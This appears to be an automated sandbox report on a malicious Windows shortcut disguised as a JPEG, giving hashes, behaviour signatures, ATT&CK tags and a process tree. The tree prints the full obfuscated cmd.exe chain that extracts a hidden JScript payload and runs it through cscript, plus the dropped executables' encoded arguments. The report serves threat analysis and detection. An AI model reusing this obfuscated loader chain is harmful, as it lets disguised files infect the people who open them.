3c7def980dfdebc0e03d8a3d3e2ee8367268ea676050e767e3c6ad77b8f9219e

Analysis

max time kernel
4294197s
max time network
123s
platform
windows7_x64
resource
win7-20220311-en
submitted
17-03-2022 13:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CopyIdentityLicense.jpg.lnk
Size

602KB
MD5

d1f069c6021aba84d1fa010295312315
SHA1

85f3f53c12a8bb7d9525b5d30ec51fdc354c1a21
SHA256

a0ec772fd0d24ce6e5c8ffd9ec018f3b2463d6d0246d8cb9b8bbbe9230dba330
SHA512

710be7d2ad7f1ad2416b29b4d4b6ebd335ecdeb778b41ea2e12a3b4ef6a6df4f2e5908117b58a15e96dfde8e3bf79b7da6ba362b915ffb33e9aef904df91edf9

Score

8^/10

Malware Config

Signatures

Executes dropped EXE 2 IoCs

Processes:

main.exeRdrCER.exe

pid process

1704 main.exe
988 RdrCER.exe
Deletes itself 1 IoCs

Processes:

cscript.exe

pid process

1556 cscript.exe
Loads dropped DLL 4 IoCs

Processes:

main.exe

pid process

1704 main.exe
1704 main.exe
1704 main.exe
1704 main.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2028 PING.EXE
Suspicious behavior: RenamesItself 1 IoCs

Processes:

cmd.exe

pid process

1956 cmd.exe

pid	process
1704	main.exe
988	RdrCER.exe

pid	process
1556	cscript.exe

pid	process
1704	main.exe
1704	main.exe
1704	main.exe
1704	main.exe

pid	process
2028	PING.EXE

pid	process
1956	cmd.exe

Suspicious use of WriteProcessMemory 50 IoCs

Processes:

cmd.execmd.execmd.execmd.execmd.execmd.execscript.exetaskeng.exemain.exe

description	pid	process	target process
PID 1800 wrote to memory of 1492	1800	cmd.exe	cmd.exe
PID 1800 wrote to memory of 1492	1800	cmd.exe	cmd.exe
PID 1800 wrote to memory of 1492	1800	cmd.exe	cmd.exe
PID 1492 wrote to memory of 2028	1492	cmd.exe	PING.EXE
PID 1492 wrote to memory of 2028	1492	cmd.exe	PING.EXE
PID 1492 wrote to memory of 2028	1492	cmd.exe	PING.EXE
PID 1492 wrote to memory of 2020	1492	cmd.exe	cmd.exe
PID 1492 wrote to memory of 2020	1492	cmd.exe	cmd.exe
PID 1492 wrote to memory of 2020	1492	cmd.exe	cmd.exe
PID 2020 wrote to memory of 1052	2020	cmd.exe	fc.exe
PID 2020 wrote to memory of 1052	2020	cmd.exe	fc.exe
PID 2020 wrote to memory of 1052	2020	cmd.exe	fc.exe
PID 2020 wrote to memory of 1088	2020	cmd.exe	cmd.exe
PID 2020 wrote to memory of 1088	2020	cmd.exe	cmd.exe
PID 2020 wrote to memory of 1088	2020	cmd.exe	cmd.exe
PID 1088 wrote to memory of 656	1088	cmd.exe	chkdsk.exe
PID 1088 wrote to memory of 656	1088	cmd.exe	chkdsk.exe
PID 1088 wrote to memory of 656	1088	cmd.exe	chkdsk.exe
PID 1088 wrote to memory of 2000	1088	cmd.exe	cmd.exe
PID 1088 wrote to memory of 2000	1088	cmd.exe	cmd.exe
PID 1088 wrote to memory of 2000	1088	cmd.exe	cmd.exe
PID 1088 wrote to memory of 1236	1088	cmd.exe	find.exe
PID 1088 wrote to memory of 1236	1088	cmd.exe	find.exe
PID 1088 wrote to memory of 1236	1088	cmd.exe	find.exe
PID 1088 wrote to memory of 1956	1088	cmd.exe	cmd.exe
PID 1088 wrote to memory of 1956	1088	cmd.exe	cmd.exe
PID 1088 wrote to memory of 1956	1088	cmd.exe	cmd.exe
PID 1956 wrote to memory of 956	1956	cmd.exe	sort.exe
PID 1956 wrote to memory of 956	1956	cmd.exe	sort.exe
PID 1956 wrote to memory of 956	1956	cmd.exe	sort.exe
PID 1956 wrote to memory of 1872	1956	cmd.exe	cmd.exe
PID 1956 wrote to memory of 1872	1956	cmd.exe	cmd.exe
PID 1956 wrote to memory of 1872	1956	cmd.exe	cmd.exe
PID 1872 wrote to memory of 952	1872	cmd.exe	cscript.exe
PID 1872 wrote to memory of 952	1872	cmd.exe	cscript.exe
PID 1872 wrote to memory of 952	1872	cmd.exe	cscript.exe
PID 952 wrote to memory of 1556	952	cscript.exe	cscript.exe
PID 952 wrote to memory of 1556	952	cscript.exe	cscript.exe
PID 952 wrote to memory of 1556	952	cscript.exe	cscript.exe
PID 1972 wrote to memory of 1704	1972	taskeng.exe	main.exe
PID 1972 wrote to memory of 1704	1972	taskeng.exe	main.exe
PID 1972 wrote to memory of 1704	1972	taskeng.exe	main.exe
PID 1972 wrote to memory of 1704	1972	taskeng.exe	main.exe
PID 1704 wrote to memory of 988	1704	main.exe	RdrCER.exe
PID 1704 wrote to memory of 988	1704	main.exe	RdrCER.exe
PID 1704 wrote to memory of 988	1704	main.exe	RdrCER.exe
PID 1704 wrote to memory of 988	1704	main.exe	RdrCER.exe
PID 1704 wrote to memory of 988	1704	main.exe	RdrCER.exe
PID 1704 wrote to memory of 988	1704	main.exe	RdrCER.exe
PID 1704 wrote to memory of 988	1704	main.exe	RdrCER.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\CopyIdentityLicense.jpg.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1800

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping /? & set yc=Ve& cmd /c "echo hello& set he=cS& set lq=%cd%& flash /? & set ne=mO& ver &set eo=ip& set ua=C:\Users\Admin\AppData\Local\Temp\&fc &set gd=dat& set pv=*.z& cmd /c "set gp=//^& (for /d %i in ("%ua%%pv%%eo%") do echo ok ^& for %e in ("%i\Co*pg*") do cd %i ^& set u=1) ^& set bm=cr^& chkdsk /? ^& set pl=cO^& set ox=:J^& type "Co*pg*"^|find "VER1"^>"%ua%wct7ZD7ASHB.%gd%" ^& cmd /c " title run ^& (if not %u%==1 (%ne%%yc% /y "Co*pg* " "%ua%") else (%pl%Py /y "Co*pg* " "%ua%" )) ^& sort /? ^& cd %lq% ^& date /? ^& set zu=%he%%bm%%eo%t ^& cmd /c " %zu% "%gp%E%ox%S%bm%%eo%t" "%ua%wct7ZD7ASHB.%gd%" ^& echo dn""""
2⤵
- Suspicious use of WriteProcessMemory
PID:1492

C:\Windows\system32\PING.EXE
ping /?
3⤵
- Runs ping.exe
PID:2028

C:\Windows\system32\cmd.exe
cmd /c "echo hello& set he=cS& set lq=C:\Users\Admin\AppData\Local\Temp& flash /? & set ne=mO& ver &set eo=ip& set ua=C:\Users\Admin\AppData\Local\Temp\&fc &set gd=dat& set pv=*.z& cmd /c "set gp=//& (for /d %i in ("%ua%%pv%%eo%") do echo ok & for %e in ("%i\Co*pg*") do cd %i & set u=1) & set bm=cr& chkdsk /? & set pl=cO& set ox=:J& type "Co*pg*"|find "VER1">"%ua%wct7ZD7ASHB.%gd%" & cmd /c " title run ^& (if not %u%==1 (%ne%%yc% /y "Co*pg* " "%ua%") else (%pl%Py /y "Co*pg* " "%ua%" )) ^& sort /? ^& cd %lq% ^& date /? ^& set zu=%he%%bm%%eo%t ^& cmd /c " %zu% "%gp%E%ox%S%bm%%eo%t" "%ua%wct7ZD7ASHB.%gd%" & echo dn""""
3⤵
- Suspicious use of WriteProcessMemory
PID:2020

C:\Windows\system32\fc.exe
fc
4⤵
PID:1052

C:\Windows\system32\cmd.exe
cmd /c "set gp=//& (for /d %i in ("%ua%%pv%%eo%") do echo ok & for %e in ("%i\Co*pg*") do cd %i & set u=1) & set bm=cr& chkdsk /? & set pl=cO& set ox=:J& type "Co*pg*"|find "VER1">"%ua%wct7ZD7ASHB.%gd%" & cmd /c " title run & (if not %u%==1 (%ne%Ve /y "Co*pg* " "%ua%") else (%pl%Py /y "Co*pg* " "%ua%" )) & sort /? & cd %lq% & date /? & set zu=%he%%bm%%eo%t & cmd /c " %zu% "%gp%E%ox%S%bm%%eo%t" "%ua%wct7ZD7ASHB.%gd%" & echo dn"""
4⤵
- Suspicious use of WriteProcessMemory
PID:1088

C:\Windows\system32\chkdsk.exe
chkdsk /?
5⤵
PID:656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" type "Co*pg*""
5⤵
PID:2000

C:\Windows\system32\find.exe
find "VER1"
5⤵
PID:1236

C:\Windows\system32\cmd.exe
cmd /c " title run & (if not %u%==1 (mOVe /y "Co*pg* " "C:\Users\Admin\AppData\Local\Temp\") else (%pl%Py /y "Co*pg* " "C:\Users\Admin\AppData\Local\Temp\" )) & sort /? & cd C:\Users\Admin\AppData\Local\Temp & date /? & set zu=cS%bm%ipt & cmd /c " %zu% "%gp%E%ox%S%bm%ipt" "C:\Users\Admin\AppData\Local\Temp\wct7ZD7ASHB.dat"
5⤵
- Suspicious behavior: RenamesItself
- Suspicious use of WriteProcessMemory
PID:1956

C:\Windows\system32\sort.exe
sort /?
6⤵
PID:956

C:\Windows\system32\cmd.exe
cmd /c " %zu% "//E:JScript" "C:\Users\Admin\AppData\Local\Temp\wct7ZD7ASHB.dat
6⤵
- Suspicious use of WriteProcessMemory
PID:1872

C:\Windows\system32\cscript.exe
cScript "//E:JScript" C:\Users\Admin\AppData\Local\Temp\wct7ZD7ASHB.dat
7⤵
- Suspicious use of WriteProcessMemory
PID:952

C:\Windows\System32\cscript.exe
"C:\Windows\System32\cscript.exe" "//E:JScript" "C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\Templates\wct02CJI0.dat"
8⤵
- Deletes itself
PID:1556

C:\Windows\system32\taskeng.exe
taskeng.exe {9FCBC35C-5400-47A0-B244-B29CF99B3AF0} S-1-5-21-2199625441-3471261906-229485034-1000:DRLQIXCW\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1972

C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\main.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\main.exe -p"29GGZr" -sp"""NDI0MjQyNDItNDI0Mi00MjQyLTQyNDItNDI0MjQyNDI0MjQy"" ""devDISMWKI.tmp"" ""NTM0OTQ0"" ""Ni4xLjc2MDE%3D"" 0 ""65C36820"" ""MzE4NTQ5d2N0ZH1hcGZkdFBUWl8%3D"" 0"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1704

C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\RdrCER.exe
"C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\RdrCER.exe" "NDI0MjQyNDItNDI0Mi00MjQyLTQyNDItNDI0MjQyNDI0MjQy" "devDISMWKI.tmp" "NTM0OTQ0" "Ni4xLjc2MDE%3D" 0 "65C36820" "MzE4NTQ5d2N0ZH1hcGZkdFBUWl8%3D" 0
3⤵
- Executes dropped EXE
PID:988

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\RdrCER.exe
MD5
e1b17e3ed49f8b4f08c9bef6e17c4a47

SHA1
f18ba69c54664e0bc801e9de4d7096dd3b4ec3b8

SHA256
c98769032c8f8cb984c44fabbaf81c53953df2d2d85d2c2f07c91f8b74601de5

SHA512
e88ea017661d9bb1110b46ab69abe9ab86d031cd988b57f5eab603accbdd14ca40a3ad7abc2457583e17482c11fc93706cd2312d6247bc5cd1bf0da3b2524d0a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\Templates\wct02CJI0.dat
MD5
59ccd44bbee1ab8e2a93f5e336938990

SHA1
cc840273d4c785de3f43bf69d0ea1d5a166bcd44

SHA256
a90c5cb345c78070df226f60480d61d2bef39113d74caec2b5fbae225f69235f

SHA512
2f586df75cbb0b76022c393101bceb8be828af88a726e36b7e3f488ac94751f6cbd0295a3e7df567efa8a1f975432ffe66b9f639cdc9b171c2990dd17a363e83

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\main.exe
MD5
f3faa3ce284dea4709353aa4fd17b11e

SHA1
3903fc1d299e435288f123e538f2a3912e5f5813

SHA256
1ddd3a76aa87e3b122da83119abc270cc3e6109f41e4a96dc7b6260162e75f31

SHA512
fae7a385b8da1dadc66b2a296976fcc683f0fa829812237359cae9d3304eeafb1d582fe5ddcd0ba365cf85735ec577686136bd442e77b1efc792188860a918c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\main.exe
MD5
f3faa3ce284dea4709353aa4fd17b11e

SHA1
3903fc1d299e435288f123e538f2a3912e5f5813

SHA256
1ddd3a76aa87e3b122da83119abc270cc3e6109f41e4a96dc7b6260162e75f31

SHA512
fae7a385b8da1dadc66b2a296976fcc683f0fa829812237359cae9d3304eeafb1d582fe5ddcd0ba365cf85735ec577686136bd442e77b1efc792188860a918c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\wct7ZD7ASHB.dat
MD5
59ccd44bbee1ab8e2a93f5e336938990

SHA1
cc840273d4c785de3f43bf69d0ea1d5a166bcd44

SHA256
a90c5cb345c78070df226f60480d61d2bef39113d74caec2b5fbae225f69235f

SHA512
2f586df75cbb0b76022c393101bceb8be828af88a726e36b7e3f488ac94751f6cbd0295a3e7df567efa8a1f975432ffe66b9f639cdc9b171c2990dd17a363e83

Download Submit
\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\RdrCER.exe
MD5
e1b17e3ed49f8b4f08c9bef6e17c4a47

SHA1
f18ba69c54664e0bc801e9de4d7096dd3b4ec3b8

SHA256
c98769032c8f8cb984c44fabbaf81c53953df2d2d85d2c2f07c91f8b74601de5

SHA512
e88ea017661d9bb1110b46ab69abe9ab86d031cd988b57f5eab603accbdd14ca40a3ad7abc2457583e17482c11fc93706cd2312d6247bc5cd1bf0da3b2524d0a

Download Submit
\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\RdrCER.exe
MD5
e1b17e3ed49f8b4f08c9bef6e17c4a47

SHA1
f18ba69c54664e0bc801e9de4d7096dd3b4ec3b8

SHA256
c98769032c8f8cb984c44fabbaf81c53953df2d2d85d2c2f07c91f8b74601de5

SHA512
e88ea017661d9bb1110b46ab69abe9ab86d031cd988b57f5eab603accbdd14ca40a3ad7abc2457583e17482c11fc93706cd2312d6247bc5cd1bf0da3b2524d0a

Download Submit
\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\RdrCER.exe
MD5
e1b17e3ed49f8b4f08c9bef6e17c4a47

SHA1
f18ba69c54664e0bc801e9de4d7096dd3b4ec3b8

SHA256
c98769032c8f8cb984c44fabbaf81c53953df2d2d85d2c2f07c91f8b74601de5

SHA512
e88ea017661d9bb1110b46ab69abe9ab86d031cd988b57f5eab603accbdd14ca40a3ad7abc2457583e17482c11fc93706cd2312d6247bc5cd1bf0da3b2524d0a

Download Submit
\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\RdrCER.exe
MD5
e1b17e3ed49f8b4f08c9bef6e17c4a47

SHA1
f18ba69c54664e0bc801e9de4d7096dd3b4ec3b8

SHA256
c98769032c8f8cb984c44fabbaf81c53953df2d2d85d2c2f07c91f8b74601de5

SHA512
e88ea017661d9bb1110b46ab69abe9ab86d031cd988b57f5eab603accbdd14ca40a3ad7abc2457583e17482c11fc93706cd2312d6247bc5cd1bf0da3b2524d0a

Download Submit
memory/1704-95-0x0000000075081000-0x0000000075083000-memory.dmp

Filesize
8KB

Download
memory/1800-54-0x000007FEFB551000-0x000007FEFB553000-memory.dmp

Filesize
8KB

Download